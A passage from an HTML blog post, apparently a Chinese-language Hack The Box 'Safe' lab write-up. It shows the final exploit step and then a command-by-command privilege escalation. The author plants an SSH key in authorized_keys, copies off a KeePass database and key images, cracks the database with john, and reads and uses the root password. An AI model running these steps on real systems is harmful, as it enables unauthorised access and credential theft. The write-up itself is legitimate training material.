class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>这里Gadgets并不是唯一的，当可利用的Gadgets很多时，getshell的方法也不止一种，这里国外一个叫大佬写了几种其他的方法：<a href="https://0xdf.gitlab.io/2019/10/26/htb-safe.html" target="_blank" rel="noopener">https://0xdf.gitlab.io/2019/10/26/htb-safe.html</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">root@kali:htb/safe <span class="comment"># python exp1.py</span></span><br><span class="line">[+] Opening connection to 10.10.10.147 on port 1337: Done</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line">$ whoami</span><br><span class="line">user</span><br></pre></td></tr></table></figure>

<h1 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h1><p>刚刚翻看服务器的时候看到家目录下有几张图片和<code>MyPasswords.kdbx</code>（这个不就是我因为记不住密码用的密码管理器，最后因为记不住密码管理器的密码导致所有密码都丢了的KeePass吗）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ ls</span><br><span class="line">IMG_0545.JPG</span><br><span class="line">IMG_0546.JPG</span><br><span class="line">IMG_0547.JPG</span><br><span class="line">IMG_0548.JPG</span><br><span class="line">IMG_0552.JPG</span><br><span class="line">IMG_0553.JPG</span><br><span class="line">myapp</span><br><span class="line">MyPasswords.kdbx</span><br><span class="line">user.txt</span><br></pre></td></tr></table></figure>

<p>有好几张图片，有个kdbx数据库，这个意思就蛮明显的了吧：kdbx是通过密码+图片来保护的。通过刚刚的方法获得shell之后，因为这台机子还开了22端口，所以可以将自己的公钥复制进来，就可以通过ssh连接了，然后下载文件下来进行爆破。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@kali:htb/safe <span class="comment"># cat ~/.ssh/id_rsa.pub | base64 -w0</span></span><br><span class="line">c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FEUmZBbjhSK0FtWWV4RkJUdW1zTDBUekJOTHJCOUs1NG1VT1JBa1l3T3JOcDNrYnhrejBvWHlGckR0cGdWc2pWdDQ4SkFRS0J2UXBCMmlBY3ZoYk5mZjRwVTJhdWZmMkZ4Z....(省略)</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">echo</span> c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FEUmZBbjhSK0FtWWV4RkJUdW1zTDBUekJOTHJCOUs1NG1VT1JBa1l3T3JOcDNrYnhrejBvWHlGckR0cGdWc2pWdDQ4SkFRS0J2UXBCMmlBY3ZoYk5mZjRwVTJhdWZmMkZ4Z....(省略) | base64 -d &gt;&gt; /home/user/.ssh/authorized_keys</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">root@kali<span class="comment"># scp -i ~/id_rsa_generated user@10.10.10.147:~/IMG* .</span></span><br><span class="line">IMG_0545.JPG                                                       100% 1863KB 944.7KB/s   00:01    </span><br><span class="line">IMG_0546.JPG                                                       100% 1872KB   1.6MB/s   00:01    </span><br><span class="line">IMG_0547.JPG                                                       100% 2470KB   2.0MB/s   00:01    </span><br><span class="line">IMG_0548.JPG                                                       100% 2858KB   1.5MB/s   00:01    </span><br><span class="line">IMG_0552.JPG                                                       100% 1099KB   1.6MB/s   00:00    </span><br><span class="line">IMG_0553.JPG                                                       100% 1060KB   2.3MB/s   00:00    </span><br><span class="line">root@kali<span class="comment"># scp -i ~/id_rsa_generated user@10.10.10.147:~/*.kdbx .</span></span><br><span class="line">MyPasswords.kdbx                                                   100% 2446</span><br></pre></td></tr></table></figure>

<p>使用keepass2john来生成hash文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">root@kali<span class="comment"># keepass2john MyPasswords.kdbx &gt; MyPasswords.kdbx.john; for img in $(ls IMG*); do /opt/john/run/keepass2john -k $img MyPasswords.kdbx; done &gt;&gt; MyPasswords.kdbx.john</span></span><br><span class="line"></span><br><span class="line">root@kali<span class="comment"># cat MyPasswords.kdbx.john </span></span><br><span class="line">MyPasswords:<span class="variable">$keepass</span>$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96</span><br><span class="line">MyPasswords:<span class="variable">$keepass</span>$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*17c3509ccfb3f9bf864fca0bfaa9ab137c7fca4729ceed90907899eb50dd88ae</span><br><span class="line">MyPasswords:<span class="variable">$keepass</span>$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*a22ce4289b755aaebc6d4f1b49f2430abb6163e942ecdd10a4575aefe984d162</span><br><span class="line">MyPasswords:<span class="variable">$keepass</span>$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*e949722c426b3604b5f2c9c2068c46540a5a2a1c557e66766bab5881f36d93c7</span><br><span class="line">MyPasswords:<span class="variable">$keepass</span>$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*d86a22408dcbba156ca37e6883030b1a2699f0da5879c82e422c12e78356390f</span><br><span class="line">MyPasswords:<span class="variable">$keepass</span>$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*facad4962e8f4cb2718c1ff290b5026b7a038ec6de739ee8a8a2dd929c376794</span><br><span class="line">MyPasswords:<span class="variable">$keepass</span>$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96*1*64*7c83badcfe0cd581613699bb4254d3ad06a1a517e2e81c7a7ff4493a5f881cf2</span><br></pre></td></tr></table></figure>

<p>做过几台htb的机子后感觉这里的爆破都用<code>rockyou.txt</code>字典都能跑出来（不过rockyou.txt有点大，先从小的试起），使用<code>john</code>来爆破：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">root@kali<span class="comment"># john MyPasswords.kdbx.john /usr/share/seclists/Passwords/Leaked-Databases/rockyou-30.txt </span></span><br><span class="line">Warning: only loading hashes of <span class="built_in">type</span> <span class="string">"KeePass"</span>, but also saw <span class="built_in">type</span> <span class="string">"tripcode"</span></span><br><span class="line">Use the <span class="string">"--format=tripcode"</span> option to force loading hashes of that <span class="built_in">type</span> instead</span><br><span class="line">Warning: only loading hashes of <span class="built_in">type</span> <span class="string">"KeePass"</span>, but also saw <span class="built_in">type</span> <span class="string">"descrypt"</span></span><br><span class="line">Use the <span class="string">"--format=descrypt"</span> option to force loading hashes of that <span class="built_in">type</span> instead</span><br><span class="line">Using default input encoding: UTF-8</span><br><span class="line">Loaded 7 password hashes with 7 different salts (KeePass [SHA256 AES 32/64 OpenSSL])</span><br><span class="line">Cost 1 (iteration count) is 60000 <span class="keyword">for</span> all loaded hashes</span><br><span class="line">Cost 2 (version) is 2 <span class="keyword">for</span> all loaded hashes</span><br><span class="line">Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 <span class="keyword">for</span> all loaded hashes</span><br><span class="line">Will run 3 OpenMP threads</span><br><span class="line">Press <span class="string">'q'</span> or Ctrl-C to abort, almost any other key <span class="keyword">for</span> status</span><br><span class="line">bullshit         (MyPasswords)</span><br><span class="line">1g 0:00:01:20 0.47% 2/3 (ETA: 15:46:09) 0.01239g/s 91.21p/s 154.1c/s 154.1C/s emerald..francesco</span><br><span class="line">Use the <span class="string">"--show"</span> option to display all of the cracked passwords reliably</span><br><span class="line">Session aborted</span><br></pre></td></tr></table></figure>

<p>拿到密码后打开密码管理器看看</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">root@kali<span class="comment"># kpcli --key IMG_0547.JPG --kdb MyPasswords.kdbx</span></span><br><span class="line">Please provide the master password: *************************</span><br><span class="line"></span><br><span class="line">KeePass CLI (kpcli) v3.1 is ready <span class="keyword">for</span> operation.</span><br><span class="line">Type <span class="string">'help'</span> <span class="keyword">for</span> a description of available commands.</span><br><span class="line">Type <span class="string">'help &lt;command&gt;'</span> <span class="keyword">for</span> details on individual commands.</span><br><span class="line"></span><br><span class="line">kpcli:/&gt; ls</span><br><span class="line">=== Groups ===</span><br><span class="line">MyPasswords/</span><br><span class="line">kpcli:/&gt; <span class="built_in">cd</span> MyPasswords/</span><br><span class="line">kpcli:/MyPasswords&gt; ls</span><br><span class="line">=== Groups ===</span><br><span class="line">eMail/</span><br><span class="line">General/</span><br><span class="line">Homebanking/</span><br><span class="line">Internet/</span><br><span class="line">Network/</span><br><span class="line">Recycle Bin/</span><br><span class="line">Windows/</span><br><span class="line">=== Entries ===</span><br><span class="line">0. Root password</span><br><span class="line">kpcli:/MyPasswords&gt; show -f R</span><br><span class="line">Recycle\ Bin/   Root\ password</span><br><span class="line">kpcli:/MyPasswords&gt; show -f Root\ password</span><br><span class="line"></span><br><span class="line"> Path: /MyPasswords/</span><br><span class="line">Title: Root password</span><br><span class="line">Uname: root</span><br><span class="line"> Pass: u3v2249dl9ptv465cogl3cnpo3fyhk</span><br><span class="line">  URL:</span><br><span class="line">Notes:</span><br></pre></td></tr></table></figure>

<p>使用<code>su -</code>命令提权：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">user@safe:~$ su -</span><br><span class="line">Password:</span><br><span class="line">root@safe:~<span class="comment"># cat root.txt</span></span><br><span class="line">d7af235eb1.....</span><br></pre></td></tr></table></figure>


      </div>
      <footer class="post-footer">
        <div class="post-tags">
            <a href="/tags/pwn/">pwn</a>
            </div>
        
        <nav class="post-nav"><a class="prev" href="/2019/12/15/Defcon-2015-R0pbaby-writeup/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">Defcon 2015 R0pbaby writeup - PWN</span>
        <span class="prev-text nav-mobile">上一篇</span>
      </a>
    <a class="next" href="/2019/12/11/htb-heist/">
        <span class="next-text nav-default">HTB heist Writeup</span>
        <span class="prev-text nav-mobile">下一篇</span>
        <i class="iconfont icon-right"></i>
      </a>
    </nav></footer>
    </article></div><div class="comments" id="comments"><div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div></div>
      </main>

      <footer id="footer" class="footer"><div class="social-links"><a href="mailto:cxliker@qq.com" class="iconfont icon-email" title="email"></a>
        <a href="https://github.com/cxliker" class="iconfont icon-github" title="github"></a>
        <a href="/atom.xml" class="iconfont icon-rss" title="rss"></a>
    </div><div class="copyright">
  <span class="power-by">
    由 <a class="hexo-link" href="https://hexo.io/">Hexo</a> 强力驱动
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    主题 - 
    <a class="theme-link" href="https://github.com/ahonn/hexo-theme-even">Even</a>
  </span>

  <span class="copyright-year">&copy;2018 - 2019<span class="heart">
      <i class="iconfont icon-heart"></i>
    </span>
    <span class="author">danta</span>
  </span>
</div>
</footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div><script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'https://cxliker.github.io/2019/12/14/htb-safe-writeup/';
        this.page.identifier = '2019/12/14/htb-safe-writeup/';
        this.page.title = 'HTB safe Writeup';
    };
    (function() {
    var d = document, s = d.createElement('script');

    s.src = '//cxliker.disqus.com/embed.js';

    s.setAttribute('data-timestamp', +new Date());
    (d.head || d.body).appendChild(s);
    })();  
  </script><script type="text/javascript" src="/lib/jquery/jquery.min.js"></script>
  <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  <script type="text/javascript" src="/lib/pjax/jquery.pjax.min.js"></script>
  <script type="text/javascript" src="/lib/nprogress/nprogress.min.js"></script>
  <script type="text/javascript" src="/js/src/even.js?v=2.11.1"></script>
</body>
</html>
